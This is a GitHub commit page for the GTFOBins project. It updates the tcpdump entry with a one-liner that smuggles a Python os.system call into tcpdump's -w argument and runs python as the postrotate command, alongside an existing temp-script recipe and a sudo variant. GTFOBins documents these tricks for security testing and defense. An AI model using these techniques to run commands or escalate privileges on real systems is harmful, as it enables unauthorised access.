Update tcpdump (adding one-line with arbitrary command)

GTFOBins · May 29, 2024 · 387651d · 387651d
1 parent 2afe22a
commit 387651d
Showing 1 changed file with 5 additions and 1 deletion.
diff --git a/_gtfobins/tcpdump.md b/_gtfobins/tcpdump.md
@@ -5,12 +5,16 @@ description: |
  In recent distributions (e.g., Debian 10 and Ubuntu 18) AppArmor limits the `postrotate-command` to a small subset of predefined commands thus preventing the execution of the following.
 functions:
  command:
- - code: |
+ - description: This requires several commands.
+ code: |
  COMMAND='id'
  TF=$(mktemp)
  echo "$COMMAND" > $TF
  chmod +x $TF
  tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
+ - descprition: One-liner to run arbitrary command leveraging python argument parser that does not require a space between the option -c and the value.
+ code: |
+ tcpdump -ln -i lo -w -c__import__\(\"os\"\).system\(\"id\"\) -W 1 -G 1 -z /usr/bin/python
  sudo:
  - code: |
  COMMAND='id'